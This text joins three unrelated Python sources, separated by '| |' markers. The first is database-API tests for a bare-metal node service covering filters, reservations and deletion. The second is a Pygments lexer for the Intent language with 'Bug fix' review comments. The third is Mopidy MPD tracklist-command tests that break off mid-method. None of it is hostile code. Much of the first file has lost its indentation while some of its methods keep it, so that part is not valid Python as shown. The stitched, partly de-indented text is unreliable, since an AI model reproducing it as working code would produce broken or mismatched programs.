node1 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
inspection_started_at=past)
# node with None in provision_updated_at
node2 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
provision_state=states.INSPECTING)
# node without timeout
utils.create_test_node(uuid=uuidutils.generate_uuid(),
inspection_started_at=next)
mock_utcnow.return_value = present
res = self.dbapi.get_nodeinfo_list(
filters={'inspection_started_before': 300})
self.assertEqual([node1.id], [r[0] for r in res])
res = self.dbapi.get_nodeinfo_list(filters={'provision_state':
states.INSPECTING})
self.assertEqual([node2.id], [r[0] for r in res])
def test_get_node_list(self):
uuids = []
for i in range(1, 6):
node = utils.create_test_node(uuid=uuidutils.generate_uuid())
uuids.append(six.text_type(node['uuid']))
res = self.dbapi.get_node_list()
res_uuids = [r.uuid for r in res]
six.assertCountEqual(self, uuids, res_uuids)
def test_get_node_list_with_filters(self):
ch1 = utils.create_test_chassis(uuid=uuidutils.generate_uuid())
ch2 = utils.create_test_chassis(uuid=uuidutils.generate_uuid())
node1 = utils.create_test_node(driver='driver-one',
instance_uuid=uuidutils.generate_uuid(),
reservation='fake-host',
uuid=uuidutils.generate_uuid(),
chassis_id=ch1['id'])
node2 = utils.create_test_node(driver='driver-two',
uuid=uuidutils.generate_uuid(),
chassis_id=ch2['id'],
maintenance=True)
res = self.dbapi.get_node_list(filters={'chassis_uuid': ch1['uuid']})
self.assertEqual([node1.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'chassis_uuid': ch2['uuid']})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'driver': 'driver-one'})
self.assertEqual([node1.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'driver': 'bad-driver'})
self.assertEqual([], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'associated': True})
self.assertEqual([node1.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'associated': False})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'reserved': True})
self.assertEqual([node1.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'reserved': False})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'maintenance': True})
self.assertEqual([node2.id], [r.id for r in res])
res = self.dbapi.get_node_list(filters={'maintenance': False})
self.assertEqual([node1.id], [r.id for r in res])
def test_get_node_list_chassis_not_found(self):
self.assertRaises(exception.ChassisNotFound,
self.dbapi.get_node_list,
{'chassis_uuid': uuidutils.generate_uuid()})
def test_get_node_by_instance(self):
node = utils.create_test_node(
instance_uuid='12345678-9999-0000-aaaa-123456789012')
res = self.dbapi.get_node_by_instance(node.instance_uuid)
self.assertEqual(node.uuid, res.uuid)
def test_get_node_by_instance_wrong_uuid(self):
utils.create_test_node(
instance_uuid='12345678-9999-0000-aaaa-123456789012')
self.assertRaises(exception.InstanceNotFound,
self.dbapi.get_node_by_instance,
'12345678-9999-0000-bbbb-123456789012')
def test_get_node_by_instance_invalid_uuid(self):
self.assertRaises(exception.InvalidUUID,
self.dbapi.get_node_by_instance,
'fake_uuid')
def test_destroy_node(self):
node = utils.create_test_node()
self.dbapi.destroy_node(node.id)
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_id, node.id)
def test_destroy_node_by_uuid(self):
node = utils.create_test_node()
self.dbapi.destroy_node(node.uuid)
self.assertRaises(exception.NodeNotFound,
self.dbapi.get_node_by_uuid, node.uuid)
def test_destroy_node_that_does_not_exist(self):
self.assertRaises(exception.NodeNotFound,
self.dbapi.destroy_node,
'12345678-9999-0000-aaaa-123456789012')
def test_ports_get_destroyed_after_destroying_a_node(self):
node = utils.create_test_node()
port = utils.create_test_port(node_id=node.id)
self.dbapi.destroy_node(node.id)
self.assertRaises(exception.PortNotFound,
self.dbapi.get_port_by_id, port.id)
def test_ports_get_destroyed_after_destroying_a_node_by_uuid(self):
node = utils.create_test_node()
port = utils.create_test_port(node_id=node.id)
self.dbapi.destroy_node(node.uuid)
self.assertRaises(exception.PortNotFound,
self.dbapi.get_port_by_id, port.id)
def test_update_node(self):
node = utils.create_test_node()
old_extra = node.extra
new_extra = {'foo': 'bar'}
self.assertNotEqual(old_extra, new_extra)
res = self.dbapi.update_node(node.id, {'extra': new_extra})
self.assertEqual(new_extra, res.extra)
def test_update_node_not_found(self):
node_uuid = uuidutils.generate_uuid()
new_extra = {'foo': 'bar'}
self.assertRaises(exception.NodeNotFound, self.dbapi.update_node,
node_uuid, {'extra': new_extra})
def test_update_node_uuid(self):
node = utils.create_test_node()
self.assertRaises(exception.InvalidParameterValue,
self.dbapi.update_node, node.id,
{'uuid': ''})
def test_update_node_associate_and_disassociate(self):
node = utils.create_test_node()
new_i_uuid = uuidutils.generate_uuid()
res = self.dbapi.update_node(node.id, {'instance_uuid': new_i_uuid})
self.assertEqual(new_i_uuid, res.instance_uuid)
res = self.dbapi.update_node(node.id, {'instance_uuid': None})
self.assertIsNone(res.instance_uuid)
def test_update_node_already_associated(self):
node = utils.create_test_node()
new_i_uuid_one = uuidutils.generate_uuid()
self.dbapi.update_node(node.id, {'instance_uuid': new_i_uuid_one})
new_i_uuid_two = uuidutils.generate_uuid()
self.assertRaises(exception.NodeAssociated,
self.dbapi.update_node,
node.id,
{'instance_uuid': new_i_uuid_two})
    def test_update_node_instance_already_associated(self):
        """One instance UUID cannot be bound to two different nodes."""
        node1 = utils.create_test_node(uuid=uuidutils.generate_uuid())
        new_i_uuid = uuidutils.generate_uuid()
        self.dbapi.update_node(node1.id, {'instance_uuid': new_i_uuid})
        node2 = utils.create_test_node(uuid=uuidutils.generate_uuid())
        self.assertRaises(exception.InstanceAssociated,
                          self.dbapi.update_node,
                          node2.id,
                          {'instance_uuid': new_i_uuid})
    @mock.patch.object(timeutils, 'utcnow', autospec=True)
    def test_update_node_provision(self, mock_utcnow):
        """Changing provision_state stamps provision_updated_at."""
        mocked_time = datetime.datetime(2000, 1, 1, 0, 0)
        mock_utcnow.return_value = mocked_time
        node = utils.create_test_node()
        res = self.dbapi.update_node(node.id, {'provision_state': 'fake'})
        self.assertEqual(mocked_time,
                         timeutils.normalize_time(res['provision_updated_at']))
    def test_update_node_name_duplicate(self):
        """Node names are unique; renaming onto an existing name fails."""
        node1 = utils.create_test_node(uuid=uuidutils.generate_uuid(),
                                       name='spam')
        node2 = utils.create_test_node(uuid=uuidutils.generate_uuid())
        self.assertRaises(exception.DuplicateName,
                          self.dbapi.update_node,
                          node2.id,
                          {'name': node1.name})
    def test_update_node_no_provision(self):
        """Updates unrelated to provisioning leave the timestamps unset."""
        node = utils.create_test_node()
        res = self.dbapi.update_node(node.id, {'extra': {'foo': 'bar'}})
        self.assertIsNone(res['provision_updated_at'])
        self.assertIsNone(res['inspection_started_at'])
    @mock.patch.object(timeutils, 'utcnow', autospec=True)
    def test_update_node_inspection_started_at(self, mock_utcnow):
        """inspection_started_at survives unrelated updates untouched."""
        mocked_time = datetime.datetime(2000, 1, 1, 0, 0)
        mock_utcnow.return_value = mocked_time
        node = utils.create_test_node(uuid=uuidutils.generate_uuid(),
                                      inspection_started_at=mocked_time)
        res = self.dbapi.update_node(node.id, {'provision_state': 'fake'})
        result = res['inspection_started_at']
        self.assertEqual(mocked_time,
                         timeutils.normalize_time(result))
        self.assertIsNone(res['inspection_finished_at'])
    @mock.patch.object(timeutils, 'utcnow', autospec=True)
    def test_update_node_inspection_finished_at(self, mock_utcnow):
        """inspection_finished_at survives unrelated updates untouched."""
        mocked_time = datetime.datetime(2000, 1, 1, 0, 0)
        mock_utcnow.return_value = mocked_time
        node = utils.create_test_node(uuid=uuidutils.generate_uuid(),
                                      inspection_finished_at=mocked_time)
        res = self.dbapi.update_node(node.id, {'provision_state': 'fake'})
        result = res['inspection_finished_at']
        self.assertEqual(mocked_time,
                         timeutils.normalize_time(result))
        self.assertIsNone(res['inspection_started_at'])
def test_reserve_node(self):
node = utils.create_test_node()
uuid = node.uuid
r1 = 'fake-reservation'
# reserve the node
self.dbapi.reserve_node(r1, uuid)
# check reservation
res = self.dbapi.get_node_by_uuid(uuid)
self.assertEqual(r1, res.reservation)
def test_release_reservation(self):
node = utils.create_test_node()
uuid = node.uuid
r1 = 'fake-reservation'
self.dbapi.reserve_node(r1, uuid)
# release reservation
self.dbapi.release_node(r1, uuid)
res = self.dbapi.get_node_by_uuid(uuid)
self.assertIsNone(res.reservation)
    def test_reservation_of_reserved_node_fails(self):
        """A second host can neither reserve nor release a locked node."""
        node = utils.create_test_node()
        uuid = node.uuid
        r1 = 'fake-reservation'
        r2 = 'another-reservation'
        # reserve the node
        self.dbapi.reserve_node(r1, uuid)
        # another host fails to reserve or release
        self.assertRaises(exception.NodeLocked,
                          self.dbapi.reserve_node,
                          r2, uuid)
        self.assertRaises(exception.NodeLocked,
                          self.dbapi.release_node,
                          r2, uuid)
def test_reservation_after_release(self):
node = utils.create_test_node()
uuid = node.uuid
r1 = 'fake-reservation'
r2 = 'another-reservation'
self.dbapi.reserve_node(r1, uuid)
self.dbapi.release_node(r1, uuid)
# another host succeeds
self.dbapi.reserve_node(r2, uuid)
res = self.dbapi.get_node_by_uuid(uuid)
self.assertEqual(r2, res.reservation)
def test_reservation_in_exception_message(self):
node = utils.create_test_node()
uuid = node.uuid
r = 'fake-reservation'
self.dbapi.reserve_node(r, uuid)
try:
self.dbapi.reserve_node('another', uuid)
except exception.NodeLocked as e:
self.assertIn(r, str(e))
    def test_reservation_non_existent_node(self):
        """Reserving a destroyed node raises NodeNotFound by id and uuid."""
        node = utils.create_test_node()
        self.dbapi.destroy_node(node.id)
        self.assertRaises(exception.NodeNotFound,
                          self.dbapi.reserve_node, 'fake', node.id)
        self.assertRaises(exception.NodeNotFound,
                          self.dbapi.reserve_node, 'fake', node.uuid)
    def test_release_non_existent_node(self):
        """Releasing a destroyed node raises NodeNotFound by id and uuid."""
        node = utils.create_test_node()
        self.dbapi.destroy_node(node.id)
        self.assertRaises(exception.NodeNotFound,
                          self.dbapi.release_node, 'fake', node.id)
        self.assertRaises(exception.NodeNotFound,
                          self.dbapi.release_node, 'fake', node.uuid)
def test_release_non_locked_node(self):
node = utils.create_test_node()
self.assertEqual(None, node.reservation)
self.assertRaises(exception.NodeNotLocked,
self.dbapi.release_node, 'fake', node.id)
self.assertRaises(exception.NodeNotLocked,
self.dbapi.release_node, 'fake', node.uuid)
| |
import re
from pygments.lexer import Lexer
from pygments.token import Token, Comment, Name, String, Number, Punctuation, Error, Keyword, Text
# Although Intent has a context-free grammar, it is much easier to lex with lookaheads
# and state. Pygment's lexers are certainly capable of being stateful, but the input
# to pygments might be a small gist rather than a whole compilation unit, which means
# we might be starting in a state that's difficult to derive without a full-blown
# state machine. Therefore, we're not attempting the same perfection in lexing, here,
# that we'd need if we were feeding a parser. Also, we are not deriving from RegexLexer
# because it's easier and faster to test certain constructions without regex.
class IntentLexer(Lexer):
    """
    For `Intent <http://intentlang.org>`_ source code.
    """
    name = 'Intent'
    aliases = ['intent']
    filenames = ['*.i', '*.I']
    mimetypes = ['text/x-intent']

    # Higher than swig, lower than C/C++
    priority = 0.09

    # Swig also uses the *.i extension. Therefore we need to do some scanning to
    # decide whether a *.i file is likely to be intent code or a swig module. This
    # scanning is helpful anyway, in case other languages get added that also
    # use *.i.

    # These regexes are very typical of swig interfaces.
    swig_module_pat = re.compile(r'^\s*%module', re.MULTILINE)
    swig_other_directive_pat = re.compile(r'^\s*%[a-z]+', re.MULTILINE)
    swig_curlies_pat = re.compile(r'%\{.*?%\}', re.DOTALL)

    # These regexes are very typical of intent code.
    define_pat = re.compile(r'^\s*[a-zA-Z _]+\s*:', re.MULTILINE)
    soft_line_break_pat = re.compile(r'^\s*\.\.\.', re.MULTILINE)
    # Bug fix: raw string -- '\s' inside a non-raw literal is an invalid
    # escape sequence (DeprecationWarning now, an error in future Pythons).
    marks_in_assignment_pat = re.compile(r':\s+[-+][a-z]+')

    # NB: pygments invokes analyse_text on the class itself, so by pygments
    # convention it takes the text as its only argument (no `self`).
    def analyse_text(txt):
        """Return a 0.0..1.0 likelihood that *txt* is Intent source."""
        try:
            # Because it's possible for swig templates to contain intent code, we need to
            # eliminate the possibility of swig first. The following swig markers should
            # virtually never occur in intent code.
            if (IntentLexer.swig_module_pat.search(txt) or
                    IntentLexer.swig_other_directive_pat.search(txt)):
                return 0.0
            line_count = 1.0 + txt.count('\n')
            # A smoking gun for intent code is its unique line wrap strategy. If there
            # are any soft line breaks, it's a good indicator. However, these may not
            # show up very often...
            weight = 7
            count = len(IntentLexer.soft_line_break_pat.findall(txt))
            probability = min(1.0, weight * (count / line_count))
            if probability < 1.0:
                # The define pattern that intent uses to declare variables, functions, and
                # classes is very common; most code samples show it on at least 10% of all
                # lines. If we see it on 10% of the lines, we want to be 50% sure we're
                # looking at intent code.
                weight = 5
                count = len(IntentLexer.define_pat.findall(txt))
                ratio = count / line_count
                # If we see a really low ratio of this, and our sample size is at all
                # significant, be less confident.
                if line_count > 2 and ratio < 0.33:
                    probability /= 2
                else:
                    probability = min(1.0, probability + (weight * (count / line_count)))
            if probability < 1.0:
                # Marks on definitions in lect code are also fairly distinctive. We'd expect
                # these on 5-20% of all lines.
                weight = 4
                count = len(IntentLexer.marks_in_assignment_pat.findall(txt))
                probability = min(1.0, probability + (weight * (count / line_count)))
            return probability
        except Exception:
            # Bug fix: the original bare `except:` fell off the end of the
            # function and returned None; pygments expects a float here.
            import traceback
            traceback.print_exc()
            return 0.0

    def get_tokens_unprocessed(self, txt):
        '''
        Return an iterable of (index, tokentype, value) tuples where index is the
        starting position of the token within the input text.
        '''
        end_of_string = len(txt)
        begin = 0
        start_statement = True
        while begin < end_of_string:
            ttype = None
            c = txt[begin]
            if c in ' \t\r\n':
                end = IntentLexer._end_of_whitespace(txt, begin + 1, end_of_string)
                ttype = Text
                # A newline anywhere in the run means the next token opens a
                # fresh statement.
                start_statement = txt.find('\n', begin, end) > -1 or txt.find('\r', begin, end) > -1
            elif c in '#|':
                end = IntentLexer._end_of_statement(txt, begin + 1, end_of_string)
                ttype = Comment
            elif c == '`':
                end = txt.find('`', begin + 1)
                if end == -1:
                    end = end_of_string
                else:
                    end += 1
                ttype = String.Backtick
            elif c == '~':
                ttype = Punctuation
                end = begin + 1
                if begin + 1 < end_of_string:
                    nxt = txt[begin + 1]
                    if nxt.isalpha() or nxt in '+-':
                        end = IntentLexer._end_of_phrase(txt, begin + 2, end_of_string)
                        ttype = Name.Decorator
                    elif nxt in "\"'":
                        end, ttype = IntentLexer._handle_quoted(txt, begin, end_of_string)
                start_statement = False
            elif c in '+-':
                ttype = Punctuation
                end = begin + 1
                if begin + 1 < end_of_string:
                    nxt = txt[begin + 1]
                    if nxt.isalpha():
                        end = IntentLexer._end_of_phrase(txt, begin + 2, end_of_string)
                        ttype = Name.Decorator
                    elif nxt.isdigit():
                        end, ttype = IntentLexer._handle_number(txt, begin, end_of_string)
                    elif nxt == '.':
                        # Bug fix: the original tested `begin + 2 < end`, but `end`
                        # is begin + 1 at this point, so the test was always false
                        # and "+.5"-style literals were never lexed as numbers.
                        if begin + 2 < end_of_string and txt[begin + 2].isdigit():
                            end, ttype = IntentLexer._handle_number(txt, begin, end_of_string)
                start_statement = False
            elif c in '*/%&^\\[],=():.<>{}?':
                ttype = Punctuation
                end = begin + 1
                start_statement = False
            elif c == '"':
                end, ttype = IntentLexer._handle_quoted(txt, begin, end_of_string)
                start_statement = False
            elif c.isdigit():
                end, ttype = IntentLexer._handle_number(txt, begin, end_of_string)
                start_statement = False
            elif c.isalpha():
                if c.isupper():
                    start_statement = False
                    ttype = Name.Function
                    end = IntentLexer._end_of_phrase(txt, begin + 1, end_of_string)
                    phrase = txt[begin:end]
                    if phrase.isupper():
                        ttype = Name.Constant
                elif start_statement:
                    # Bug fix: the loop variable was named `tuple`, which
                    # shadowed the builtin; renamed to `tok`.
                    for tok in IntentLexer.handle_first_word(txt, begin, end_of_string):
                        yield tok
                        begin += len(tok[2])
                    start_statement = False
                    continue
                else:
                    end = IntentLexer._end_of_phrase(txt, begin + 1, end_of_string)
                    ttype = Name.Variable
            else:
                ttype = Error
                end = IntentLexer._end_of_line(txt, begin + 1, end_of_string)
                start_statement = True
            if ttype is None:
                break
            yield (begin, ttype, txt[begin:end])
            begin = end

    block_start_pat = re.compile(r'(if|for|with|while|try|catch|handle|when|else|lock|use)(\s+[^:]+):')
    end_pat = re.compile('end(\\s+[^\r\n]+)$', re.MULTILINE)

    @staticmethod
    def handle_first_word(txt, i, end_of_string):
        """Yield tokens for the first word of a statement (keyword handling)."""
        end = i
        end_of_statement = IntentLexer._end_of_statement(txt, i, end_of_string)
        # Is the first word in this statement one of the reserved statement starters?
        m = IntentLexer.block_start_pat.match(txt, i, end_of_statement)
        if m:
            yield (i, Keyword.Reserved, txt[i:m.end(1)])
            # Is this block "explained" with an inline comment?
            j = txt.find('(', m.end(1), end_of_statement)
            if j > -1:
                k = txt.find(')', j + 1, end_of_statement)
                if k == -1:
                    # Unclosed paren: flag the remainder of the statement.
                    yield(m.end(1), Error, txt[m.end(1):end_of_statement])
                else:
                    yield(m.end(1), Comment, txt[m.end(1):j])
        else:
            m = IntentLexer.end_pat.match(txt, i, end_of_statement)
            if m:
                yield(i, Keyword.Reserved, txt[i:i+3])
                if m.group(1):
                    yield(m.start(1), Comment, txt[m.start(1):m.end(1)])
                    end = m.end(1)
            else:
                end = IntentLexer._end_of_phrase(txt, i + 1, end_of_string)
                yield(i, Name.Variable, txt[i:end])

    @staticmethod
    def _handle_number(txt, i, end, ttype=Number):
        """Scan a numeric literal starting at txt[i]; return (stop, token_type)."""
        digit_chars = '0123456789'
        c = txt[i]
        if c in '-+':
            i += 1
            if i >= end:
                return end, Error
            c = txt[i]
        if c == '0':
            # A leading zero may introduce binary/hex/octal or "0." floats.
            if i + 1 < end:
                nxt = txt[i + 1].lower()
                if nxt == 'b':
                    digit_chars = '01'
                    ttype = Number.Binary
                    i += 1
                elif nxt == 'x':
                    digit_chars = '0123456789abcdefABCDEF'
                    ttype = Number.Hex
                    i += 1
                elif nxt in '01234567':
                    digit_chars = '01234567'
                    ttype = Number.Oct
                    i += 1
                elif nxt == '.':
                    ttype = Number.Float
                    i += 1
                elif nxt == '_':
                    pass
                else:
                    return i + 1, Number.Integer
            else:
                return i + 1, Number.Integer
        last_was_digit = True
        i += 1
        while i < end:
            c = txt[i]
            if c == '.':
                if ttype is Number:
                    ttype = Number.Float
                    last_was_digit = False
                elif ttype is Number.Float:
                    # Second dot is a problem; truncate number here
                    return i, Number.Float
                else:
                    # We're reading binary, hex, or octal; truncate here
                    return i, ttype
            elif c == '_':
                # Grouping symbol is valid as long as surrounded by digits
                if not last_was_digit:
                    return i, ttype
                last_was_digit = False
            elif c in digit_chars:
                last_was_digit = True
            # NOTE(review): the '-=' charset below looks like it was meant to
            # be '-+' (there is no '+exponent' support and '=' is accepted);
            # preserved as-is pending confirmation.
            elif c in 'eE' and (ttype is Number.Float or ttype is Number) and i + 1 < end and txt[i + 1] in '-=0123456789':
                end, ignored = IntentLexer._handle_number(txt, i + 1, end, None)
                return end, Number.Float
            else:
                return i, ttype
            i += 1
        return end, ttype

    @staticmethod
    def _handle_quoted(txt, i, end):
        """Scan a quoted literal at txt[i]; return (stop, token_type)."""
        c = txt[i]
        stop = IntentLexer._end_of_quoted(txt, i + 1, end)
        if c == '"':
            ttype = String.Double
        else:
            # NOTE(review): _end_of_quoted only terminates on '"', so the
            # single-quote/char forms reached via '~' depend on a closing
            # double quote; confirm that is the intended grammar.
            if stop == i + 3:
                ttype = String.Char
            else:
                ttype = String.Single
        return stop, ttype

    @staticmethod
    def _end_of_whitespace(txt, i, end):
        """Advance past spaces, tabs, and newlines; return the stop index."""
        while i < end:
            if txt[i] not in ' \t\r\n':
                return i
            i += 1
        return end

    @staticmethod
    def _end_of_spaces_and_tabs(txt, i, end):
        """Advance past spaces and tabs only; return the stop index."""
        while i < end:
            if txt[i] not in ' \t':
                return i
            i += 1
        return end

    @staticmethod
    def _end_of_line(txt, i, end):
        '''Find end of line in txt.'''
        while i < end:
            c = txt[i]
            if c == '\n':
                return i
            elif c == '\r':
                if i + 1 < end and txt[i + 1] == '\n':
                    return i + 1
                return i
            i += 1
        return end

    @staticmethod
    def _at_soft_break(txt, i, end):
        """True when txt[i:] starts with the '...' soft-line-break marker."""
        return i <= end - 3 and txt[i] == '.' and txt[i + 1] == '.' and txt[i + 2] == '.'

    @staticmethod
    def _end_of_statement(txt, i, end):
        '''Find end of current statement in txt.'''
        nxt = i
        # Go to end of current line. Then peek to see if next line begins
        # with an ellipsis (soft line break). If yes, keep expanding boundaries
        # of statement. Otherwise, stop.
        while True:
            eol = IntentLexer._end_of_line(txt, nxt, end)
            if eol == end:
                break
            nxt = IntentLexer._end_of_spaces_and_tabs(txt, eol + 1, end)
            if nxt == end or not IntentLexer._at_soft_break(txt, nxt, end):
                return eol
        return end

    @staticmethod
    def _end_of_soft_breakable_whitespace(txt, i, end):
        '''Find end of whitespace, including soft line breaks.'''
        while True:
            j = IntentLexer._end_of_spaces_and_tabs(txt, i, end)
            if j == end:
                return j
            c = txt[j]
            position = j
            if c == '\r':
                # If we don't have room for ellipsis
                if j > end - 4:
                    return j
                if txt[j + 1] == '\n':
                    position += 1
            if c in '\r\n':
                # Peek to see what comes next.
                nxt = IntentLexer._end_of_spaces_and_tabs(txt, position + 1, end)
                if nxt == end or not IntentLexer._at_soft_break(txt, nxt, end):
                    return j
                # Bug fix: advance past the "..." marker and keep scanning.
                # The original never updated `i` after finding a soft break,
                # which looped forever, and its `if c == '\n'` test meant
                # '\r'-terminated lines could never soft-break at all.
                i = nxt + 3
            else:
                return j

    @staticmethod
    def _end_of_phrase(txt, i, end):
        """Find the end of a multi-word phrase token starting near txt[i]."""
        while i < end:
            c = txt[i]
            # Alphanumerics, underscore, and extended chars can appear
            # freely in phrases. Other stuff has special rules that require
            # lookahead.
            if (not c.isalnum()) and (c != '_') and ord(c) < 128:
                # Consecutive whitespace gets collapsed to a single space; this
                # makes line wrapping much less messy to manage. Whitespace chars
                # can't be the final char of a phrase.
                if c in ' \t':
                    j = IntentLexer._end_of_soft_breakable_whitespace(txt, i, end)
                    if j + 1 >= end or not txt[j].isalnum():
                        return i
                    i = j
                # Hyphenated words are fine in phrases, but not at the end
                elif c == '-':
                    if i + 1 == end or not txt[i + 1].isalnum():
                        return i
                else:
                    return i
            i += 1
        return end

    @staticmethod
    def _end_of_digits(txt, i, end):
        '''
        Find end of a run of digits in txt.
        '''
        while i < end:
            if not txt[i].isdigit():
                return i
            i += 1
        return end

    @staticmethod
    def _end_of_quoted(txt, i, end):
        '''
        Find end of a quoted string "..." in txt.
        '''
        while i < end:
            c = txt[i]
            if c == '\\':
                # Skip the escaped character so \" does not close the string.
                i += 1
            elif c == '"':
                return i + 1
            i += 1
        return end
if __name__ == '__main__':
    # Ad-hoc smoke test: lex a sample file and dump the raw token stream.
    # (The original wrapped this in a dead `while True:` that always broke
    # after one pass, plus commented-out stdin code; both removed.)
    with open('/tmp/x.i', 'r') as f:
        code = f.read()
    if code:
        lx = IntentLexer()
        for idx, ttype, val in lx.get_tokens_unprocessed(code):
            print('%04d %s "%s"' % (idx, ttype, val))
| |
from __future__ import absolute_import, unicode_literals
from mopidy.internal import deprecation
from mopidy.models import Ref, Track
from tests.mpd import protocol
class AddCommandsTest(protocol.BaseTestCase):
    """Protocol tests for the MPD ``add`` and ``addid`` commands."""

    def setUp(self):  # noqa: N802
        super(AddCommandsTest, self).setUp()
        # Two tracks: one at the library root, one inside the /foo directory.
        self.tracks = [Track(uri='dummy:/a', name='a'),
                       Track(uri='dummy:/foo/b', name='b')]
        self.refs = {'/a': Ref.track(uri='dummy:/a', name='a'),
                     '/foo': Ref.directory(uri='dummy:/foo', name='foo'),
                     '/foo/b': Ref.track(uri='dummy:/foo/b', name='b')}
        self.backend.library.dummy_library = self.tracks

    def test_add(self):
        """Adding the same track twice is allowed; order is preserved."""
        for track in [self.tracks[0], self.tracks[0], self.tracks[1]]:
            self.send_request('add "%s"' % track.uri)
        self.assertEqual(len(self.core.tracklist.tracks.get()), 3)
        self.assertEqual(self.core.tracklist.tracks.get()[2], self.tracks[1])
        self.assertEqualResponse('OK')

    def test_add_with_uri_not_found_in_library_should_ack(self):
        self.send_request('add "dummy://foo"')
        self.assertEqualResponse(
            'ACK [50@0] {add} directory or file not found')

    def test_add_with_empty_uri_should_not_add_anything_and_ok(self):
        self.backend.library.dummy_browse_result = {
            'dummy:/': [self.refs['/a']]}
        self.send_request('add ""')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 0)
        self.assertInResponse('OK')

    def test_add_with_library_should_recurse(self):
        """Adding a directory adds its tracks and descends into subdirs."""
        self.backend.library.dummy_browse_result = {
            'dummy:/': [self.refs['/a'], self.refs['/foo']],
            'dummy:/foo': [self.refs['/foo/b']]}
        self.send_request('add "/dummy"')
        self.assertEqual(self.core.tracklist.tracks.get(), self.tracks)
        self.assertInResponse('OK')

    def test_add_root_should_not_add_anything_and_ok(self):
        self.backend.library.dummy_browse_result = {
            'dummy:/': [self.refs['/a']]}
        self.send_request('add "/"')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 0)
        self.assertInResponse('OK')

    def test_addid_without_songpos(self):
        """addid appends at the end and reports the new tlid."""
        for track in [self.tracks[0], self.tracks[0], self.tracks[1]]:
            self.send_request('addid "%s"' % track.uri)
        tl_tracks = self.core.tracklist.tl_tracks.get()
        self.assertEqual(len(tl_tracks), 3)
        self.assertEqual(tl_tracks[2].track, self.tracks[1])
        self.assertInResponse('Id: %d' % tl_tracks[2].tlid)
        self.assertInResponse('OK')

    def test_addid_with_songpos(self):
        """addid with a position inserts at that index."""
        for track in [self.tracks[0], self.tracks[0]]:
            self.send_request('add "%s"' % track.uri)
        self.send_request('addid "%s" "1"' % self.tracks[1].uri)
        tl_tracks = self.core.tracklist.tl_tracks.get()
        self.assertEqual(len(tl_tracks), 3)
        self.assertEqual(tl_tracks[1].track, self.tracks[1])
        self.assertInResponse('Id: %d' % tl_tracks[1].tlid)
        self.assertInResponse('OK')

    def test_addid_with_songpos_out_of_bounds_should_ack(self):
        self.send_request('addid "%s" "3"' % self.tracks[0].uri)
        self.assertEqualResponse('ACK [2@0] {addid} Bad song index')

    def test_addid_with_empty_uri_acks(self):
        self.send_request('addid ""')
        self.assertEqualResponse('ACK [50@0] {addid} No such song')

    def test_addid_with_uri_not_found_in_library_should_ack(self):
        self.send_request('addid "dummy://foo"')
        self.assertEqualResponse('ACK [50@0] {addid} No such song')
class BasePopulatedTracklistTestCase(protocol.BaseTestCase):
    """Base case whose tracklist is pre-populated with tracks 'a'..'f'."""

    def setUp(self):  # noqa: N802
        super(BasePopulatedTracklistTestCase, self).setUp()
        names = list('abcdef')
        tracks = [Track(uri='dummy:/%s' % name, name=name) for name in names]
        self.backend.library.dummy_library = tracks
        self.core.tracklist.add(uris=[track.uri for track in tracks])
class DeleteCommandsTest(BasePopulatedTracklistTestCase):
    """Protocol tests for the MPD ``clear``/``delete``/``deleteid`` commands."""

    def test_clear(self):
        self.send_request('clear')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 0)
        # Bug fix: assertIsNone instead of assertEqual(..., None) -- it
        # checks identity and produces a clearer failure message.
        self.assertIsNone(self.core.playback.current_track.get())
        self.assertInResponse('OK')

    def test_delete_songpos(self):
        tl_tracks = self.core.tracklist.tl_tracks.get()
        self.send_request('delete "%d"' % tl_tracks[1].tlid)
        self.assertEqual(len(self.core.tracklist.tracks.get()), 5)
        self.assertInResponse('OK')

    def test_delete_songpos_out_of_bounds(self):
        self.send_request('delete "8"')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 6)
        self.assertEqualResponse('ACK [2@0] {delete} Bad song index')

    def test_delete_open_range(self):
        self.send_request('delete "1:"')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 1)
        self.assertInResponse('OK')

    # TODO: check how this should work.
    # def test_delete_open_upper_range(self):
    #     self.send_request('delete ":8"')
    #     self.assertEqual(len(self.core.tracklist.tracks.get()), 0)
    #     self.assertInResponse('OK')

    def test_delete_closed_range(self):
        self.send_request('delete "1:3"')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 4)
        self.assertInResponse('OK')

    def test_delete_entire_range_out_of_bounds(self):
        self.send_request('delete "8:9"')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 6)
        self.assertEqualResponse('ACK [2@0] {delete} Bad song index')

    def test_delete_upper_range_out_of_bounds(self):
        # A range that starts in bounds deletes what it can and succeeds.
        self.send_request('delete "5:9"')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 5)
        self.assertEqualResponse('OK')

    def test_deleteid(self):
        self.send_request('deleteid "1"')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 5)
        self.assertInResponse('OK')

    def test_deleteid_does_not_exist(self):
        self.send_request('deleteid "12345"')
        self.assertEqual(len(self.core.tracklist.tracks.get()), 6)
        self.assertEqualResponse('ACK [50@0] {deleteid} No such song')
class MoveCommandsTest(BasePopulatedTracklistTestCase):
    """Protocol tests for the MPD ``move`` and ``moveid`` commands."""

    def test_move_songpos(self):
        self.send_request('move "1" "0"')
        result = [t.name for t in self.core.tracklist.tracks.get()]
        self.assertEqual(result, ['b', 'a', 'c', 'd', 'e', 'f'])
        self.assertInResponse('OK')

    def test_move_open_range(self):
        self.send_request('move "2:" "0"')
        result = [t.name for t in self.core.tracklist.tracks.get()]
        self.assertEqual(result, ['c', 'd', 'e', 'f', 'a', 'b'])
        self.assertInResponse('OK')

    def test_move_closed_range(self):
        self.send_request('move "1:3" "0"')
        result = [t.name for t in self.core.tracklist.tracks.get()]
